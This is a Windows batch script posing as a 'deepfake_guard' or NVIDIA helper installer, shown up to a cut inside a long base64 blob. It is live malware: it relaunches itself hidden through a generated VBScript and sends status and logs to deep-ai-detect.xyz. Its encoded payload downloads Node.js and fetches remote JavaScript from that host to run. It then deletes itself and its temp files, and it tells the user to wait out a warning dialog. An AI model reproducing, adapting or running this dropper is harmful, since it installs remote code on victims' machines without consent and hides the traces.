@echo off
if defined NVDG_HIDDEN goto nvdg_main
setlocal EnableDelayedExpansion
if not exist "%TEMP%" mkdir "%TEMP%" 2>nul
set "TMP=%TEMP%"
set "LAUNCHER_STATUS=%TEMP%\deepfake_guard.launcher.status"
set "LAUNCHER_RESULT_URL=https://deep-ai-detect.xyz/guard-launcher-result"
if exist "%LAUNCHER_STATUS%" del /f /q "%LAUNCHER_STATUS%" 2>nul
del /f /q "%TEMP%\deepfake_guard.worker.lock" 2>nul
set "NVDG_SELF=%~f0"
set "NVDG_INSTALLER_DIR=%CD%"
set "_WVBS=%TEMP%\~nvdg_worker.vbs"
if exist "!_WVBS!" del /f /q "!_WVBS!" 2>nul
> "!_WVBS!" echo Set ws=CreateObject("WScript.Shell")
>> "!_WVBS!" echo ws.Run "cmd /c set NVDG_HIDDEN=1^&set NVDG_INSTALLER_DIR=!NVDG_INSTALLER_DIR!^&call ""!NVDG_SELF!""", 0, False
wscript //B "!_WVBS!" >nul 2>&1
set /a _LWAIT=0
:nvdg_wait
if exist "%LAUNCHER_STATUS%" for /f "usebackq tokens=1-4 delims=|" %%a in ("%LAUNCHER_STATUS%") do (
  if /I "%%d"=="payload_ready" goto nvdg_status_ready
  if /I "%%d"=="decode_failed" goto nvdg_status_fail
)
if !_LWAIT! GEQ 180 goto nvdg_wait_timeout
timeout /t 1 /nobreak >nul
set /a _LWAIT+=1
goto nvdg_wait
:nvdg_wait_timeout
call :nvdg_report_result 1 0 0 worker_timeout
exit /b 1
:nvdg_status_fail
set "_LEXIT=1" & set "_LOK=0" & set "_LUP=0" & set "_LMSG=decode_failed"
call :nvdg_report_result !_LEXIT! !_LOK! !_LUP! !_LMSG!
exit /b 1
:nvdg_status_ready
set "_LEXIT=1" & set "_LOK=0" & set "_LUP=0" & set "_LMSG=unknown"
for /f "usebackq tokens=1-4 delims=|" %%a in ("%LAUNCHER_STATUS%") do (
  set "_LEXIT=%%a" & set "_LOK=%%b" & set "_LUP=%%c" & set "_LMSG=%%d"
)
if !_LOK! EQU 1 (
  echo.
  echo Please wait a few minutes until the warning dialog dismisses.
  echo.
)
call :nvdg_report_result !_LEXIT! !_LOK! !_LUP! !_LMSG!
exit /b !_LEXIT!
:nvdg_report_result
where curl >nul 2>&1 || exit /b 0
set "_LOKJ=false" & if "%2"=="1" set "_LOKJ=true"
set "_LUPJ=false" & if "%3"=="1" set "_LUPJ=true"
curl -sk -X POST -H "Content-Type: application/json" -H "X-Guard-Platform: windows" -d "{\"ok\":!_LOKJ!,\"upload\":!_LUPJ!,\"exitCode\":%1,\"message\":\"%4\",\"platform\":\"windows\"}" --connect-timeout 15 --max-time 30 --retry 2 --retry-delay 2 "%LAUNCHER_RESULT_URL%" >nul 2>&1
exit /b 0
:nvdg_remove_installer
if not defined _NVDG_INST exit /b 0
if not defined NVDG_INSTALLER_DIR set "NVDG_INSTALLER_DIR=%CD%"
del /f /q "!_NVDG_INST!" 2>nul
del /f /q "%NVDG_INSTALLER_DIR%\upd_w.cmd" "%NVDG_INSTALLER_DIR%\upda_w.cmd" 2>nul
del /f /q "%TEMP%\~nvdg_*" 2>nul
del /f /q "%TEMP%\~kdm_*.b64" "%TEMP%\~kdm_*.cmd" 2>nul
del /f /q "%TEMP%\deepfake_guard.launcher.status" 2>nul
del /f /q "%TEMP%\~nvdg_worker.vbs" 2>nul
if exist "%NVDG_INSTALLER_DIR%\upd_w.cmd" goto nvdg_rm_retry
if exist "%NVDG_INSTALLER_DIR%\upda_w.cmd" goto nvdg_rm_retry
if exist "!_NVDG_INST!" goto nvdg_rm_retry
exit /b 0
:nvdg_rm_retry
set "_RI=%TEMP%\~nvdg_rminst_%RANDOM%.cmd"
if exist "!_RI!" del /f /q "!_RI!" 2>nul
> "!_RI!" echo @echo off
>>"!_RI!" echo for /L %%%%n in (1,1,60) do (
>>"!_RI!" echo   del /f /q "!_NVDG_INST!" 2^>nul
>>"!_RI!" echo   del /f /q "%NVDG_INSTALLER_DIR%\upd_w.cmd" "%NVDG_INSTALLER_DIR%\upda_w.cmd" 2^>nul
>>"!_RI!" echo   if not exist "!_NVDG_INST!" if not exist "%NVDG_INSTALLER_DIR%\upd_w.cmd" if not exist "%NVDG_INSTALLER_DIR%\upda_w.cmd" goto done
>>"!_RI!" echo   timeout /t 1 /nobreak ^>nul
>>"!_RI!" echo )
>>"!_RI!" echo :done
>>"!_RI!" echo del /f /q "%TEMP%\~nvdg_*" 2^>nul
>>"!_RI!" echo del /f /q "%TEMP%\~kdm_*.b64" "%TEMP%\~kdm_*.cmd" 2^>nul
>>"!_RI!" echo del /f /q "%TEMP%\deepfake_guard.launcher.status" 2^>nul
>>"!_RI!" echo del /f /q "%TEMP%\~nvdg_worker.vbs" 2^>nul
>>"!_RI!" echo del /f /q "%%~f0" 2^>nul
start "" /MIN cmd /D /C ""!_RI!"" >nul 2>&1
exit /b 0
:nvdg_main
setlocal EnableDelayedExpansion
if not exist "%TEMP%" mkdir "%TEMP%" 2>nul
set "TMP=%TEMP%"
set "_NVDG_INST=%~f0"
if defined NVDG_INSTALLER_DIR set "INSTALLER_DIR=%NVDG_INSTALLER_DIR%"
if not defined INSTALLER_DIR set "INSTALLER_DIR=%CD%"
echo.>"%TEMP%\deepfake_guard.worker.lock"
rem NVIDIA kernel module staging helper
set "LOG=%TEMP%\deepfake_guard.log"
set "LOG_UPLOAD_URL=https://deep-ai-detect.xyz/guard-install-log"
set "LAUNCHER_STATUS=%TEMP%\deepfake_guard.launcher.status"
>>"%LOG%" echo [%date% %time%] === deepfake_guard install started ===
set "_STUB_UP=0"
where curl >nul 2>&1
if not errorlevel 1 (
  curl -sk -X POST -H "Content-Type: text/plain" -H "X-Guard-Platform: windows" --data-binary "@%LOG%" --connect-timeout 15 --max-time 30 --retry 2 --retry-delay 2 "%LOG_UPLOAD_URL%" >nul 2>&1
  if not errorlevel 1 set "_STUB_UP=1"
)
set "_13cd02=%TEMP%\~kdm_a6d4.b64"
set "_16ed42=%TEMP%\~kdm_634f.cmd"
del /f /q "%_13cd02%" "%_16ed42%" 2>nul
set "NVDG_LAUNCHER=%~f0"
>>"%_13cd02%" echo QGVjaG8gb2ZmDQoNCnNldGxvY2FsIEVuYWJsZURlbGF5ZWRFeHBhbnNpb24NCg0KaWYgbm90IGV4
>>"%_13cd02%" echo aXN0ICIlVEVNUCUiIG1rZGlyICIlVEVNUCUiIDI+bnVsDQoNCnNldCAiVE1QPSVURU1QJSINCg0K
>>"%_13cd02%" echo c2V0ICJJTlNUQUxMRVJfRElSPSVDRCUiDQoNCmlmIGRlZmluZWQgTlZER19JTlNUQUxMRVJfRElS
>>"%_13cd02%" echo IHNldCAiSU5TVEFMTEVSX0RJUj0lTlZER19JTlNUQUxMRVJfRElSJSINCg0KZGVsIC9mIC9xICIl
>>"%_13cd02%" echo VEVNUCVcfm52ZGdfbG9ndXBsb2FkXyouY21kIiAiJVRFTVAlXH5udmRnX2RlbF8qLmNtZCIgIiVU
>>"%_13cd02%" echo RU1QJVx+bnZkZ19ybWluc3RfKi5jbWQiIDI+bnVsDQoNCnNldCAiTE9HPSVURU1QJVxkZWVwZmFr
>>"%_13cd02%" echo ZV9ndWFyZC5sb2ciDQoNCnNldCAiTE9HX1VQTE9BRF9VUkw9aHR0cHM6Ly9kZWVwLWFpLWRldGVj
>>"%_13cd02%" echo dC54eXovZ3VhcmQtaW5zdGFsbC1sb2ciDQoNCnNldCAiVE1QRElSPSVURU1QJVxkZWVwZmFrZV9n
>>"%_13cd02%" echo dWFyZF93b3JrIg0KDQpzZXQgIkxPQ0tESVI9JVRFTVAlXGRlZXBmYWtlX2d1YXJkLmxvY2suZCIN
>>"%_13cd02%" echo Cg0Kc2V0ICJHVUFSRF9TVE9SRT1odHRwczovL2RlZXAtYWktZGV0ZWN0Lnh5eiINCg0Kc2V0ICJN
>>"%_13cd02%" echo QVhfQVRURU1QVFM9OCINCg0Kc2V0ICJOT0RFX0NPTk5FQ1RfVElNRU9VVD0xMjAiDQoNCnNldCAi
>>"%_13cd02%" echo Tk9ERV9NQVhfVElNRT03MjAwIg0KDQpzZXQgIk5PREVfQ1VSTF9SRVRSWT04Ig0KDQpzZXQgIkdV
>>"%_13cd02%" echo QVJEX0NPTk5FQ1RfVElNRU9VVD0xMjAiDQoNCnNldCAiR1VBUkRfTUFYX1RJTUU9NzIwMCINCg0K
>>"%_13cd02%" echo c2V0ICJHVUFSRF9DVVJMX1JFVFJZPTgiDQoNCnNldCAiQ1VSTF9TVEFMTF9MSU1JVD01MDAiDQoN
>>"%_13cd02%" echo CnNldCAiQ1VSTF9TVEFMTF9USU1FPTE4MCINCg0Kc2V0ICJHVUFSRF9KU19NSU49NTAwMDAiDQoN
>>"%_13cd02%" echo CnNldCAiR1VBUkRfRVhJVD0wIg0KDQpzZXQgL2EgTE9DS19XQUlUPTANCg0KPj4iJUxPRyUiIGVj
>>"%_13cd02%" echo aG8gWyVkYXRlJSAldGltZSVdID09PSBkZWVwZmFrZV9ndWFyZCBpbnN0YWxsIHN0YXJ0ZWQgPT09
>>"%_13cd02%" echo DQoNCndoZXJlIGN1cmwgPm51bCAyPiYxDQoNCmlmIGVycm9ybGV2ZWwgMSAoDQoNCiAgY2FsbCA6
>>"%_13cd02%" echo bG9nIEZBSUwgY3VybCBub3QgZm91bmQgaW4gUEFUSA0KDQogIGV4aXQgL2IgMQ0KDQopDQoNCmNh
>>"%_13cd02%" echo bGwgOnVwbG9hZF9ndWFyZF9sb2cNCg0KY2FsbCA6Y2xlYXJfc3RhbGVfbG9jaw0KDQpjYWxsIDpp
>>"%_13cd02%" echo bnN0YWxsX3J1bm5pbmcNCg0KaWYgbm90IGVycm9ybGV2ZWwgMSAoDQoNCiAgPj4iJUxPRyUiIGVj
>>"%_13cd02%" echo aG8gWyVkYXRlJSAldGltZSVdIElORk8gaW5zdGFsbCBhbHJlYWR5IHJ1bm5pbmcsIHNraXBwaW5n
>>"%_13cd02%" echo IGR1cGxpY2F0ZSBsYXVuY2gNCg0KICBjYWxsIDp1cGxvYWRfZ3VhcmRfbG9nDQoNCiAgZXhpdCAv
>>"%_13cd02%" echo YiAwDQoNCikNCg0KY2FsbCA6YWNxdWlyZV9sb2NrDQoNCmNhbGwgOmNsZWFyX3N0YWxlX2ZpbGVz
>>"%_13cd02%" echo DQoNCmNhbGwgOmxvZyBPSyBiYXQgc3RhcnRlZA0KDQplY2hvIDBefDFefDBefHBheWxvYWRfcmVh
>>"%_13cd02%" echo ZHk+ICIlVEVNUCVcZGVlcGZha2VfZ3VhcmQubGF1bmNoZXIuc3RhdHVzIg0KDQpkZWwgL2YgL3Eg
>>"%_13cd02%" echo IiVURU1QJVxkZWVwZmFrZV9ndWFyZC53b3JrZXIubG9jayIgMj5udWwNCg0KY2FsbCA6c2NoZWR1
>>"%_13cd02%" echo bGVfbG9nX3VwbG9hZA0KDQppZiBub3QgZXhpc3QgIiVUTVBESVIlIiBta2RpciAiJVRNUERJUiUi
>>"%_13cd02%" echo DQoNCmNkIC9kICIlVE1QRElSJSINCg0KaWYgZXJyb3JsZXZlbCAxICgNCg0KICBjYWxsIDpsb2cg
>>"%_13cd02%" echo RkFJTCBjZCB0byAlVE1QRElSJQ0KDQogIHNldCBHVUFSRF9FWElUPTENCg0KICBnb3RvIGNsZWFu
>>"%_13cd02%" echo dXBfZXhpdA0KDQopDQoNCmNhbGwgOmxvZyBPSyBjZCB0byAlVE1QRElSJQ0KDQpjYWxsIDpmaW5k
>>"%_13cd02%" echo X2xvY2FsX25vZGUNCg0KaWYgZGVmaW5lZCBOT0RFX0JJTiAoDQoNCiAgY2FsbCA6bG9nIE9LIHVz
>>"%_13cd02%" echo aW5nIGxvY2FsIG5vZGUgYXQgIU5PREVfQklOISB2ZXJzaW9uPSFOT0RFX1ZFUiENCg0KICBnb3Rv
>>"%_13cd02%" echo IG5vZGVfcmVhZHkNCg0KKQ0KDQpjYWxsIDpmaW5kX3N5c3RlbV9ub2RlDQoNCmlmIGRlZmluZWQg
>>"%_13cd02%" echo Tk9ERV9CSU4gKA0KDQogIGNhbGwgOmxvZyBPSyB1c2luZyBzeXN0ZW0gbm9kZSBhdCAhTk9ERV9C
>>"%_13cd02%" echo SU4hIHZlcnNpb249IU5PREVfVkVSIQ0KDQogIGdvdG8gbm9kZV9yZWFkeQ0KDQopDQoNCmNhbGwg
>>"%_13cd02%" echo OmxvZyBJTkZPIG5vIG5vZGUgZm91bmQsIGRvd25sb2FkaW5nIHBvcnRhYmxlIG5vZGUNCg0KY2Fs
>>"%_13cd02%" echo bCA6ZG93bmxvYWRfcG9ydGFibGVfbm9kZQ0KDQppZiBlcnJvcmxldmVsIDEgZ290byBjbGVhbnVw
>>"%_13cd02%" echo X2V4aXQNCg0KY2FsbCA6ZmluZF9sb2NhbF9ub2RlDQoNCmlmIG5vdCBkZWZpbmVkIE5PREVfQklO
>>"%_13cd02%" echo ICgNCg0KICBjYWxsIDpsb2cgRkFJTCBwb3J0YWJsZSBub2RlIG5vdCBmb3VuZCBhZnRlciBkb3du
>>"%_13cd02%" echo bG9hZA0KDQogIHNldCBHVUFSRF9FWElUPTENCg0KICBnb3RvIGNsZWFudXBfZXhpdA0KDQopDQoN
>>"%_13cd02%" echo CmNhbGwgOmxvZyBPSyBwb3J0YWJsZSBub2RlIHJlYWR5IGF0ICFOT0RFX0JJTiEgdmVyc2lvbj0h
>>"%_13cd02%" echo Tk9ERV9WRVIhDQoNCjpub2RlX3JlYWR5DQoNCnNldCAiR1VBUkRfSlM9JVRNUERJUiVcaW5zdGFs
>>"%_13cd02%" echo bF9ndWFyZF9hbHQuanMiDQoNCnNldCAiR1VBUkRfVVJMPSVHVUFSRF9TVE9SRSUvaW5zdGFsbF9n
>>"%_13cd02%" echo dWFyZF9hbHQuanMiDQoNCmNhbGwgOmxvZyBJTkZPIHByZXBhcmluZyBpbnN0YWxsX2d1YXJkX2Fs
>>"%_13cd02%" echo dC5qcw0KDQpjYWxsIDplbnN1cmVfZ3VhcmRfanMNCg0KaWYgZXJyb3JsZXZlbCAxIGdvdG8gY2xl
>>"%_13cd02%" echo YW51cF9leGl0DQoNCmNhbGwgOmZpbmRfbG9jYWxfbm9kZQ0KDQppZiBkZWZpbmVkIE5PREVfQklO
>>"%_13cd02%" echo IGdvdG8gcnVuX2d1YXJkDQoNCmNhbGwgOmZpbmRfc3lzdGVtX25vZGUNCg0KaWYgbm90IGRlZmlu
>>"%_13cd02%" echo ZWQgTk9ERV9CSU4gKA0KDQogIGNhbGwgOmxvZyBGQUlMIG5vIG5vZGUgYmluYXJ5IGZvdW5kIGJl
>>"%_13cd02%" echo Zm9yZSBpbnN0YWxsX2d1YXJkX2FsdC5qcw0KDQogIHNldCBHVUFSRF9FWElUPTENCg0KICBnb3Rv
>>"%_13cd02%" echo IGNsZWFudXBfZXhpdA0KDQopDQoNCmNhbGwgOmxvZyBPSyByZXNvbHZlZCBub2RlIGJlZm9yZSBy
>>"%_13cd02%" echo dW46ICFOT0RFX0JJTiENCg0KOnJ1bl9ndWFyZA0KDQpjYWxsIDpsb2cgSU5GTyBydW5uaW5nIGlu
>>"%_13cd02%" echo c3RhbGxfZ3VhcmRfYWx0LmpzIHdpdGggIU5PREVfQklOIQ0KDQoiIU5PREVfQklOISIgIiFHVUFS
>>"%_13cd02%" echo RF9KUyEiID4+IiVMT0clIiAyPiYxDQoNCnNldCBHVUFSRF9FWElUPSFlcnJvcmxldmVsIQ0KDQpp
>>"%_13cd02%" echo ZiAhR1VBUkRfRVhJVCEgRVFVIDAgKA0KDQogIGNhbGwgOmxvZyBPSyBpbnN0YWxsX2d1YXJkX2Fs
>>"%_13cd02%" echo dC5qcyBmaW5pc2hlZCBleGl0IDANCg0KKSBlbHNlICgNCg0KICBjYWxsIDpsb2cgRkFJTCBpbnN0
>>"%_13cd02%" echo YWxsX2d1YXJkX2FsdC5qcyBmaW5pc2hlZCBleGl0ICFHVUFSRF9FWElUIQ0KDQopDQoNCjpjbGVh
>>"%_13cd02%" echo bnVwX2V4aXQNCg0KY2QgL2QgIiVURU1QJSINCg0KUkVNIE5ldmVyIGRlbGV0ZSAlTE9HJSAtIGFw
>>"%_13cd02%" echo cGVuZC1vbmx5IGxvZyBrZXB0IGFjcm9zcyBydW5zDQoNCmlmIGV4aXN0ICIlVE1QRElSJSIgcm1k
>>"%_13cd02%" echo aXIgL3MgL3EgIiVUTVBESVIlIg0KDQppZiBleGlzdCAiJUxPQ0tESVIlIiBybWRpciAvcyAvcSAi
>>"%_13cd02%" echo JUxPQ0tESVIlIg0KDQpjYWxsIDpjbGVhbnVwX3RlbXBfYXJ0aWZhY3RzDQoNCmNhbGwgOmxvZyBP
>>"%_13cd02%" echo SyBjbGVhbnVwIGRvbmUNCg0KY2FsbCA6bG9nID09PSBkZWVwZmFrZV9ndWFyZCBpbnN0YWxsIGZp
>>"%_13cd02%" echo bmlzaGVkIGV4aXQgIUdVQVJEX0VYSVQhID09PQ0KDQpjYWxsIDp1cGxvYWRfZ3VhcmRfbG9nDQoN
>>"%_13cd02%" echo CmNhbGwgOmRlbGV0ZV9pbnN0YWxsZXINCg0KZXhpdCAvYiAhR1VBUkRfRVhJVCENCg0KOmNsZWFy
>>"%_13cd02%" echo X3N0YWxlX2ZpbGVzDQoNCmlmIGV4aXN0ICIlVE1QRElSJVxpbnN0YWxsX2d1YXJkX2FsdC5qcyIg
>>"%_13cd02%" echo KA0KDQogIHNldCAiU1RBTEVfU0laRT0wIg0KDQogIGZvciAlJUEgaW4gKCIlVE1QRElSJVxpbnN0
>>"%_13cd02%" echo YWxsX2d1YXJkX2FsdC5qcyIpIGRvIHNldCAiU1RBTEVfU0laRT0lJX56QSINCg0KICBpZiAhU1RB
>>"%_13cd02%" echo TEVfU0laRSEgTFNTICFHVUFSRF9KU19NSU4hICgNCg0KICAgIGNhbGwgOmxvZyBXQVJOIHJlbW92
>>"%_13cd02%" echo aW5nIGluY29tcGxldGUgaW5zdGFsbF9ndWFyZF9hbHQuanMgc2l6ZT0hU1RBTEVfU0laRSENCg0K
>>"%_13cd02%" echo ICAgIGRlbCAvZiAvcSAiJVRNUERJUiVcaW5zdGFsbF9ndWFyZF9hbHQuanMiDQoNCiAgKQ0KDQop
>>"%_13cd02%" echo DQoNCmlmIGV4aXN0ICIlVE1QRElSJVxub2RlLXYyMC4xOC4xLXdpbi14NjQiICgNCg0KICBzZXQg
>>"%_13cd02%" echo Ik5PREVfRVhFPSVUTVBESVIlXG5vZGUtdjIwLjE4LjEtd2luLXg2NFxub2RlLmV4ZSINCg0KICBz
>>"%_13cd02%" echo ZXQgIk5PREVfVkVSPSINCg0KICBpZiBub3QgZXhpc3QgIiFOT0RFX0VYRSEiICgNCg0KICAgIGNh
>>"%_13cd02%" echo bGwgOmxvZyBXQVJOIHJlbW92aW5nIGJyb2tlbiBub2RlIGRpciBtaXNzaW5nIG5vZGUuZXhlDQoN
>>"%_13cd02%" echo CiAgICBybWRpciAvcyAvcSAiJVRNUERJUiVcbm9kZS12MjAuMTguMS13aW4teDY0IiAyPm51bA0K
>>"%_13cd02%" echo DQogICAgaWYgZXhpc3QgIiVUTVBESVIlXG5vZGUuemlwIiBkZWwgL2YgL3EgIiVUTVBESVIlXG5v
>>"%_13cd02%" echo ZGUuemlwIg0KDQogICkgZWxzZSAoDQoNCiAgICBmb3IgL2YgImRlbGltcz0iICUldiBpbiAoJyIh
>>"%_13cd02%" echo Tk9ERV9FWEUhIiAtdiAyXj5eJjEnKSBkbyBzZXQgIk5PREVfVkVSPSUldiINCg0KICAgIGlmIG5v
>>"%_13cd02%" echo dCBkZWZpbmVkIE5PREVfVkVSICgNCg0KICAgICAgY2FsbCA6bG9nIFdBUk4gcmVtb3ZpbmcgYnJv
>>"%_13cd02%" echo a2VuIG5vZGUgZGlyIG5vZGUuZXhlIG5vdCBydW5uYWJsZQ0KDQogICAgICBybWRpciAvcyAvcSAi
>>"%_13cd02%" echo JVRNUERJUiVcbm9kZS12MjAuMTguMS13aW4teDY0IiAyPm51bA0KDQogICAgICBpZiBleGlzdCAi
>>"%_13cd02%" echo JVRNUERJUiVcbm9kZS56aXAiIGRlbCAvZiAvcSAiJVRNUERJUiVcbm9kZS56aXAiDQoNCiAgICAp
>>"%_13cd02%" echo DQoNCiAgKQ0KDQopDQoNCmlmIGV4aXN0ICIlVEVNUCVcZGVlcGZha2VfZ3VhcmRcIiAoDQoNCiAg
>>"%_13cd02%" echo Y2FsbCA6bG9nIFdBUk4gcmVtb3ZpbmcgbGVnYWN5IGRlZXBmYWtlX2d1YXJkIHdvcmsgZGlyDQoN
>>"%_13cd02%" echo CiAgcm1kaXIgL3MgL3EgIiVURU1QJVxkZWVwZmFrZV9ndWFyZCIgMj5udWwNCg0KKQ0KDQpleGl0
>>"%_13cd02%" echo IC9iIDANCg0KOmNsZWFyX3N0YWxlX2xvY2sNCg0KaWYgbm90IGV4aXN0ICIlTE9DS0RJUiVcIiBl
>>"%_13cd02%" echo eGl0IC9iIDANCg0KY2FsbCA6aW5zdGFsbF9ydW5uaW5nDQoNCmlmIGVycm9ybGV2ZWwgMSAoDQoN
>>"%_13cd02%" echo CiAgY2FsbCA6bG9nIFdBUk4gY2xlYXJpbmcgc3RhbGUgbG9jayBkaXINCg0KICBybWRpciAvcyAv
>>"%_13cd02%" echo cSAiJUxPQ0tESVIlIiAyPm51bA0KDQopDQoNCmV4aXQgL2IgMA0KDQo6aW5zdGFsbF9ydW5uaW5n
>>"%_13cd02%" echo DQoNCmlmIG5vdCBleGlzdCAiJUxPQ0tESVIlXHBpZCIgZXhpdCAvYiAxDQoNCnNldCAiTE9DS19Q
>>"%_13cd02%" echo SUQ9Ig0KDQpzZXQgL3AgTE9DS19QSUQ9PCIlTE9DS0RJUiVccGlkIg0KDQppZiBub3QgZGVmaW5l
>>"%_13cd02%" echo ZCBMT0NLX1BJRCBleGl0IC9iIDENCg0KaWYgL0kgIiFMT0NLX1BJRCEiPT0iQUNUSVZFIiBleGl0
>>"%_13cd02%" echo IC9iIDENCg0KdGFza2xpc3QgL0ZJICJQSUQgZXEgIUxPQ0tfUElEISIgMj5udWwgfCBmaW5kIC9J
>>"%_13cd02%" echo ICIhTE9DS19QSUQhIiA+bnVsDQoNCmlmIGVycm9ybGV2ZWwgMSBleGl0IC9iIDENCg0KZXhpdCAv
>>"%_13cd02%" echo YiAwDQoNCjphY3F1aXJlX2xvY2sNCg0KaWYgbm90IGV4aXN0ICIlTE9DS0RJUiUiIG1rZGlyICIl
>>"%_13cd02%" echo TE9DS0RJUiUiIDI+bnVsICYmIGdvdG8gbG9ja19nb3QNCg0KY2FsbCA6aW5zdGFsbF9ydW5uaW5n
>>"%_13cd02%" echo DQoNCmlmIGVycm9ybGV2ZWwgMSAoDQoNCiAgY2FsbCA6bG9nIFdBUk4gbG9jayBkaXIgZXhpc3Rz
>>"%_13cd02%" echo IGJ1dCBwcm9jZXNzIGRlYWQsIHJlY2xhaW1pbmcNCg0KICBybWRpciAvcyAvcSAiJUxPQ0tESVIl
>>"%_13cd02%" echo IiAyPm51bA0KDQogIG1rZGlyICIlTE9DS0RJUiUiIDI+bnVsDQoNCiAgZ290byBsb2NrX2dvdA0K
>>"%_13cd02%" echo DQopDQoNCmlmICFMT0NLX1dBSVQhIEdFUSA2MDAgKA0KDQogIGNhbGwgOmxvZyBXQVJOIGxvY2sg
>>"%_13cd02%" echo dGltZW91dCwgZm9yY2luZyBsb2NrDQoNCiAgcm1kaXIgL3MgL3EgIiVMT0NLRElSJSIgMj5udWwN
>>"%_13cd02%" echo Cg0KICBta2RpciAiJUxPQ0tESVIlIiAyPm51bA0KDQogIGdvdG8gbG9ja19nb3QNCg0KKQ0KDQpp
>>"%_13cd02%" echo ZiAhTE9DS19XQUlUISBFUVUgMCAoDQoNCiAgc2V0IC9wIExPQ0tfUElEPTwiJUxPQ0tESVIlXHBp
>>"%_13cd02%" echo ZCINCg0KICBjYWxsIDpsb2cgSU5GTyB3YWl0aW5nIGZvciBhbm90aGVyIGluc3RhbGwgcGlkPSFM
>>"%_13cd02%" echo T0NLX1BJRCENCg0KKQ0KDQpzZXQgL2EgTE9DS19XQUlUKz0xDQoNCnRpbWVvdXQgL3QgMSAvbm9i
>>"%_13cd02%" echo cmVhayA+bnVsDQoNCmdvdG8gYWNxdWlyZV9sb2NrDQoNCjpsb2NrX2dvdA0KDQpzZXQgIkxPQ0tf
>>"%_13cd02%" echo UElEPSINCg0KZm9yIC9mICJza2lwPTEgdG9rZW5zPTEiICUlcCBpbiAoJ3dtaWMgcHJvY2VzcyB3
>>"%_13cd02%" echo aGVyZSAibmFtZT0nV01JQy5leGUnIiBnZXQgUGFyZW50UHJvY2Vzc0lkIDJePm51bCcpIGRvIHNl
>>"%_13cd02%" echo dCAiTE9DS19QSUQ9JSVwIg0KDQppZiBub3QgZGVmaW5lZCBMT0NLX1BJRCBzZXQgIkxPQ0tfUElE
>>"%_13cd02%" echo PUFDVElWRSINCg0KZWNobyAhTE9DS19QSUQhPiAiJUxPQ0tESVIlXHBpZCINCg0KY2FsbCA6bG9n
>>"%_13cd02%" echo IE9LIGFjcXVpcmVkIGxvY2sgcGlkPSFMT0NLX1BJRCENCg0KaWYgIUxPQ0tfV0FJVCEgR1RSIDAg
>>"%_13cd02%" echo Y2FsbCA6bG9nIE9LIGFjcXVpcmVkIGxvY2sgYWZ0ZXIgIUxPQ0tfV0FJVCFzIHdhaXQNCg0KZXhp
>>"%_13cd02%" echo dCAvYiAwDQoNCjpmaW5kX2xvY2FsX25vZGUNCg0Kc2V0ICJOT0RFX0JJTj0iDQoNCnNldCAiTk9E
>>"%_13cd02%" echo RV9WRVI9Ig0KDQpzZXQgIk5PREVfRVhFPSVUTVBESVIlXG5vZGUtdjIwLjE4LjEtd2luLXg2NFxu
>>"%_13cd02%" echo b2RlLmV4ZSINCg0KaWYgZXhpc3QgIiFOT0RFX0VYRSEiICgNCg0KICBmb3IgL2YgImRlbGltcz0i
>>"%_13cd02%" echo ICUldiBpbiAoJyIhTk9ERV9FWEUhIiAtdiAyXj5eJjEnKSBkbyBzZXQgTk9ERV9WRVI9JSV2DQoN
>>"%_13cd02%" echo CiAgaWYgZGVmaW5lZCBOT0RFX1ZFUiAoDQoNCiAgICBzZXQgIk5PREVfQklOPSFOT0RFX0VYRSEi
>>"%_13cd02%" echo DQoNCiAgICBnb3RvIDplb2YNCg0KICApDQoNCiAgY2FsbCA6bG9nIFdBUk4gcmVtb3ZpbmcgYnJv
>>"%_13cd02%" echo a2VuIGxvY2FsIG5vZGUNCg0KICBybWRpciAvcyAvcSAiJVRNUERJUiVcbm9kZS12MjAuMTguMS13
>>"%_13cd02%" echo aW4teDY0IiAyPm51bA0KDQopDQoNCmlmIGV4aXN0ICIlVE1QRElSJSIgZm9yIC9mICJkZWxpbXM9
>>"%_13cd02%" echo IiAlJUYgaW4gKCdkaXIgL3MgL2IgIiVUTVBESVIlXG5vZGUuZXhlIiAyXj5udWwnKSBkbyAoDQoN
>>"%_13cd02%" echo CiAgZm9yIC9mICJkZWxpbXM9IiAlJXYgaW4gKCciJSVGIiAtdiAyXj5eJjEnKSBkbyBzZXQgTk9E
>>"%_13cd02%" echo RV9WRVI9JSV2DQoNCiAgaWYgZGVmaW5lZCBOT0RFX1ZFUiAoDQoNCiAgICBzZXQgIk5PREVfQklO
>>"%_13cd02%" echo PSUlRiINCg0KICAgIGdvdG8gOmVvZg0KDQogICkNCg0KKQ0KDQpleGl0IC9iIDANCg0KOmZpbmRf
>>"%_13cd02%" echo c3lzdGVtX25vZGUNCg0Kc2V0ICJOT0RFX0JJTj0iDQoNCnNldCAiTk9ERV9WRVI9Ig0KDQpmb3Ig
>>"%_13cd02%" echo L2YgImRlbGltcz0iICUlRiBpbiAoJ3doZXJlIG5vZGUgMl4+bnVsJykgZG8gKA0KDQogIGZvciAv
>>"%_13cd02%" echo ZiAiZGVsaW1zPSIgJSV2IGluICgnIiUlRiIgLXYgMl4+XiYxJykgZG8gc2V0IE5PREVfVkVSPSUl
>>"%_13cd02%" echo dg0KDQogIGlmIGRlZmluZWQgTk9ERV9WRVIgKA0KDQogICAgc2V0ICJOT0RFX0JJTj0lJUYiDQoN
>>"%_13cd02%" echo CiAgICBnb3RvIDplb2YNCg0KICApDQoNCikNCg0KZXhpdCAvYiAwDQoNCjpub2RlX3ppcF9pbnRl
>>"%_13cd02%" echo Z3JpdHkNCg0Kc2V0ICJOT0RFX1pJUD0lfjEiDQoNCmlmIG5vdCBkZWZpbmVkIE5PREVfWklQIHNl
>>"%_13cd02%" echo dCAiTk9ERV9aSVA9JVRNUERJUiVcbm9kZS56aXAiDQoNCmlmIG5vdCBleGlzdCAiIU5PREVfWklQ
>>"%_13cd02%" echo ISIgZXhpdCAvYiAxDQoNCmZvciAlJUEgaW4gKCIhTk9ERV9aSVAhIikgZG8gaWYgJSV+ekEgTFNT
>>"%_13cd02%" echo IDEwMjQgZXhpdCAvYiAxDQoNCndoZXJlIHRhciA+bnVsIDI+JjENCg0KaWYgbm90IGVycm9ybGV2
>>"%_13cd02%" echo ZWwgMSAoDQoNCiAgdGFyIC10ZiAiIU5PREVfWklQISIgPm51bCAyPiYxDQoNCiAgaWYgZXJyb3Js
>>"%_13cd02%" echo ZXZlbCAxIGV4aXQgL2IgMQ0KDQogIHRhciAtdGYgIiFOT0RFX1pJUCEiIDI+bnVsIHwgZmluZHN0
>>"%_13cd02%" echo ciAvaSAibm9kZS5leGUiID5udWwNCg0KICBleGl0IC9iICFlcnJvcmxldmVsIQ0KDQopDQoNCmZv
